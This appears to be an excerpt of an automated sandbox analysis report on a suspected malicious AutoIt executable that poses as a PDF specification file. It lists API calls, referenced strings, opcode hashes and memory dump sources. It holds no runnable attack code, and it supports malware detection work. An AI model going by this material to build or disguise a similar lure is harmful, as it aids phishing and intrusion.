                                      • Opcode Fuzzy Hash: 06e5565cf3a252fd789d934dd5a3827818b01eaa6bc15c61be8b8fc033078a21
                                      • Instruction Fuzzy Hash: EF115871500108AAEB125F689C44FEB3B6EEF0A378F514726F965A61E0C735AC519760
                                      APIs
                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00394DF5
                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00394E1E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Internet$OpenOption
                                      • String ID: <local>
                                      • API String ID: 942729171-4266983199
                                      • Opcode ID: 22f599d7910ed36c0b68bbd36a479740fb20104ffdd13b513c6ef80d66f602b0
                                      • Instruction ID: d3771dcc4807a765c6a7ba6af10e57ef48809c86f04729fb3d5fddcf80714528
                                      • Opcode Fuzzy Hash: 22f599d7910ed36c0b68bbd36a479740fb20104ffdd13b513c6ef80d66f602b0
                                      • Instruction Fuzzy Hash: D411AC74501221BBDF268F61C888EFBFBACFF06755F10822AF50596540D370A942C6E0
                                      APIs
                                      • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0039A84E
                                      • htons.WSOCK32(00000000,?,00000000), ref: 0039A88B
                                      Strings
                                      Similarity
                                      • API ID: htonsinet_addr
                                      • String ID: 255.255.255.255
                                      • API String ID: 3832099526-2422070025
                                      • Opcode ID: 44b33e43813e67f5f83c63b7bfd25820d104852b6e451d574778b99a7ebd253d
                                      • Instruction ID: d762985a7e6169af9c82e2d00551f3f2a1a4789f7da5a3ae0d1a1e29beb619e7
                                      • Opcode Fuzzy Hash: 44b33e43813e67f5f83c63b7bfd25820d104852b6e451d574778b99a7ebd253d
                                      • Instruction Fuzzy Hash: 8F01D275204304ABCB22AF68C88AFA9B768EF44310F10866AF5169B3D1D771E801C792
                                      APIs
                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0037B7EF
                                      Strings
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 3850602802-1403004172
                                      • Opcode ID: f0ba1e32af0f940a49d78a857a2438029949b137ce9c8f6ba6c77e813827b887
                                      • Instruction ID: f2e1a435262e0bef405adba08e36609703b6769899a131b2a994cb4efafc23a5
                                      • Opcode Fuzzy Hash: f0ba1e32af0f940a49d78a857a2438029949b137ce9c8f6ba6c77e813827b887
                                      • Instruction Fuzzy Hash: 89014C71611118ABCB56EBA4CC42EFE73BDBF06310B04461CF4615B2D1DF746808CB50
                                      APIs
                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 0037B6EB
                                      Strings
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 3850602802-1403004172
                                      • Opcode ID: a1d30ac80c5785a014163feb6107f97374b4be0f5b032fba8e3aef7e382a5b19
                                      • Instruction ID: 0ed0194c3e140a00e11362c6de6e4a8974177f9c9c1f5fcb7b18ef4ef55995c2
                                      • Opcode Fuzzy Hash: a1d30ac80c5785a014163feb6107f97374b4be0f5b032fba8e3aef7e382a5b19
                                      • Instruction Fuzzy Hash: 53018F71642008ABCB56EBA4C952BFFB3BC9F05340F104029B606BB191DF986E188BA5
                                      APIs
                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 0037B76C
                                      Strings
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 3850602802-1403004172
                                      • Opcode ID: 43870fca7b7319370d55ba3c8337f162e30ff4abe5ac4199b0e2aead00d145cd
                                      • Instruction ID: 507fa39cf4ceae2af9c3d6b86355d3e7efca1f2f0ebb9f273e4c5c9263b65a44
                                      • Opcode Fuzzy Hash: 43870fca7b7319370d55ba3c8337f162e30ff4abe5ac4199b0e2aead00d145cd
                                      • Instruction Fuzzy Hash: 5A01A271641108ABCB16E7A4C902FFFB3BC9F05344F504019B505BB192DB686E1987B5
                                      APIs
                                        • Part of subcall function 00367CF4: EnterCriticalSection.KERNEL32(00000000,?,00367ADD,0000000D), ref: 00367D1F
                                      • DeleteCriticalSection.KERNEL32(sin,003F6F48,00000010,00364E02), ref: 00371913
                                      Strings
                                      Similarity
                                      • API ID: CriticalSection$DeleteEnter
                                      • String ID: sin$"@
                                      • API String ID: 228587788-1414153351
                                      • Opcode ID: 50ab5a3b956e89ad9a9475c79643923096ff88fd6f01f4ae8bf9989fe9eec5b3
                                      • Instruction ID: 5ccb4d7ae25983b2349b11d751b49128d8aadec79515131a576876e3af34ffac
                                      • Opcode Fuzzy Hash: 50ab5a3b956e89ad9a9475c79643923096ff88fd6f01f4ae8bf9989fe9eec5b3
                                      • Instruction Fuzzy Hash: F401C4325002049FC7239BADDA4AA5CB7A4AF45320F55C19AE595EB1E1CBB8C543CB84
                                      APIs
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00403D00,00403D44), ref: 003AE37B
                                      • CloseHandle.KERNEL32 ref: 003AE38D
                                      Strings
                                      Similarity
                                      • API ID: CloseCreateHandleProcess
                                      • String ID: D=@
                                      • API String ID: 3712363035-2498164000
                                      • Opcode ID: dd77853cdbe043fac6bde4699f1fb3a8e6eb5b80f04491ad52fb6836c10bdac3
                                      • Instruction ID: 6c2415e168798f743fdf974b35c1da473c374d4f09a77271ad8e553ea71991ac
                                      • Opcode Fuzzy Hash: dd77853cdbe043fac6bde4699f1fb3a8e6eb5b80f04491ad52fb6836c10bdac3
                                      • Instruction Fuzzy Hash: 3BF05EF1540314BBE2125F61AC46F777E5CDF04755F008431BE08EA1A2D375AE0087AC
                                      APIs
                                      • LoadImageW.USER32(00340000,00000063,00000001,00000010,00000010,00000000), ref: 00344048
                                      • EnumResourceNamesW.KERNEL32(00000000,0000000E,003867E9,00000063,00000000,7617E4A0,?,?,00343EE1,?,?,000000FF), ref: 003B41B3
                                      Strings
                                      Similarity
                                      • API ID: EnumImageLoadNamesResource
                                      • String ID: >4
                                      • API String ID: 1578290342-2218818388
                                      • Opcode ID: fda48df709b639b5de687b0f5ee7e98a7f8701c70c15d30f293a91b00064b0a3
                                      • Instruction ID: 12fe98e6c61eb22d38899267f08047ce348cf695278d5de4b2ab386809b91ce9
                                      • Opcode Fuzzy Hash: fda48df709b639b5de687b0f5ee7e98a7f8701c70c15d30f293a91b00064b0a3
                                      • Instruction Fuzzy Hash: 22F0963164032477E6214B19BD46FD23B9DD709BB5F10452AF314FA5E0D3F0A0809798
                                      APIs
                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0037A63F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Message
                                      • String ID: AutoIt$Error allocating memory.
                                      • API String ID: 2030045667-4017498283
                                      • Opcode ID: 95c2803b02abd5007182504ae17b4bd3eaea3ed6c845e2575b671cb1c2015702
                                      • Instruction ID: 20ce5ea28145a312a6572c1af6b8b1f8ba9d5cc01c8184cb5818de828a0412fd
                                      • Opcode Fuzzy Hash: 95c2803b02abd5007182504ae17b4bd3eaea3ed6c845e2575b671cb1c2015702
                                      • Instruction Fuzzy Hash: B2D02B323C031837C22336A87C07FD9354C8B05B51F044032FB0CDD5C249D3995042D9
                                      APIs
                                      • GetSystemDirectoryW.KERNEL32(?), ref: 003BACC0
                                      • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 003BAEBD
                                      Strings
                                      Similarity
                                      • API ID: DirectoryFreeLibrarySystem
                                      • String ID: WIN_XPe
                                      • API String ID: 510247158-3257408948
                                      • Opcode ID: a8491b2e3639f8c842cfd7d87abd0aecb32d001855f3d6d606758bda39241b09
                                      • Instruction ID: 4d877a0a0139c94584bfccc4c6e577a3bc3764c092f4248051f68fcfb33c1fef
                                      • Opcode Fuzzy Hash: a8491b2e3639f8c842cfd7d87abd0aecb32d001855f3d6d606758bda39241b09
                                      • Instruction Fuzzy Hash: D1E03970C00909AFCB12DBA4DA449ECFBBCAB48705F148092E602F2960DB705A84DF22
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: LocalTime
                                      • String ID: %.3d$WIN_XPe
                                      • API String ID: 481472006-2409531811
                                      • Opcode ID: a50b67f14435d20545fb30f495ea7534014c6536e26bbd3a72e56a4354ebf78e
                                      • Instruction ID: 715cbc91e8517f9b3117b0010a82d7b047295103f7ebe42fc1e6187896a30e9f
                                      • Opcode Fuzzy Hash: a50b67f14435d20545fb30f495ea7534014c6536e26bbd3a72e56a4354ebf78e
                                      • Instruction Fuzzy Hash: 0BE01271804E1CEBCB139750CD05DFAB7BCA704745F5444E2FA06E1C14E7359B84AB22
                                      APIs
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003A86A2
                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003A86B5
                                        • Part of subcall function 00387A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00387AD0
                                      Strings
                                      Similarity
                                      • API ID: FindMessagePostSleepWindow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 529655941-2988720461
                                      • Opcode ID: 8f04d1d87f9db10745301e602af0025562a04ac60f6ff79eb4925479d880a2c9
                                      • Instruction ID: 70816d907cf2c38a67fa651dcc2f08a81d29116e26b6bd7fbdc1c26cac72292e
                                      • Opcode Fuzzy Hash: 8f04d1d87f9db10745301e602af0025562a04ac60f6ff79eb4925479d880a2c9
                                      • Instruction Fuzzy Hash: E8D01271385318B7E26A77709C4BFD6BA1C9B45B11F110825F749EA2D0C9F4F950C754
                                      APIs
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003A86E2
                                      • PostMessageW.USER32(00000000), ref: 003A86E9
                                        • Part of subcall function 00387A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00387AD0
                                      Strings
                                      Similarity
                                      • API ID: FindMessagePostSleepWindow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 529655941-2988720461
                                      • Opcode ID: 4c5bfe24dd13b932ec3aedb2dc320138522e8d0bf64d9c384de85e3fbb266005
                                      • Instruction ID: 69ad23def51579e4cc26caeee245d4c4a1c2737a57b0a98f2c0cd1088cb930af
                                      • Opcode Fuzzy Hash: 4c5bfe24dd13b932ec3aedb2dc320138522e8d0bf64d9c384de85e3fbb266005
                                      • Instruction Fuzzy Hash: 24D0C9713853186BE26A67709C4BFC6BA189B49B11F510825B749EA2D0C9A4F950C758
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00372658
                                      • GetLastError.KERNEL32 ref: 00372666
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 003726B9
                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 003726F4
                                      Similarity
                                      • API ID: ByteCharMultiWide$ErrorLast
                                      • String ID:
                                      • API String ID: 1717984340-0
                                      • Opcode ID: 0e21cce3341a4a87c14c171f5b385dad24437464fac71de9415aec856cf1465a
                                      • Instruction ID: c486db56d71d8822a45e0ec660f338611891528e18d74f52f042939593cba76e
                                      • Opcode Fuzzy Hash: 0e21cce3341a4a87c14c171f5b385dad24437464fac71de9415aec856cf1465a
                                      • Instruction Fuzzy Hash: 4241D7306042899FDB379F24CD84BAB7BA8BF01310F268156F459AB1A1D774DD00C761